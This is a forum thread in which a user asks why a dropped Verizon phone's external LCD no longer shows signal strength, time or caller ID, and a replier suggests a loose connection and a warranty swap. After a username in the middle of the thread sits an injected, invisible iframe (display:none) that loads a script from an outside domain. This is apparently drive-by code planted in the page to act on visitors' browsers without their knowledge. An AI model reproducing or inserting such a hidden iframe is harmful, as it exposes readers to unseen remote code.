+ Reply to Thread

Help! External LCD Not Working!

I accidentelly drop the phone, yesterday. Notice the external lcd is looking a little funny. So I soft rest set it and got the normal indicator back like the signal strength and time. Then later I lost it all again; but the blue back light still comes on; just no siganl strength indicator and time or caller id when somone calls on the external lcd but inside the touch screen everthing is there and phone works fine. I did soft rest and hard reset no improvement. The phone and palm are working perfectly only problem is no external lcd display of signal strength and time and caller id. All the information in the touch screen is there just not on the exteranal lcd. I wonder if it is software related or hardware related. Would some of you knowledgeable techies shed some light on this issue for me? Please! Thank you!

Carrier: Verizonwireless
    Software phone: MZ1.0.36
    PDA Software: SZ1.0.23
    PRL: 50110

jwtk<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sounds like it could be a loose connection on the LCD from the fall. The contacts for the LCD would be seperate from the backlight. How did you get a blue backlight.. mine is green, did they release the phone with a different backlight for the LCD? I would suggest that you take it to Verizon they might be able to fix the phone or swap it out (unless the phone is badly dammaged from the fall)

hulsmsc,
    Thank you for the reply, Sorry for the confusion on the color I'm a little color blind lately since the fall of the phone. The back light its green. I did go to the local verizon store, they told me to deal with customer service and they will send me another refub phone. I really like to take care of this me self if I could but I guess if it is a hardware problem then I have to swapt it out. Thank you again for the reply.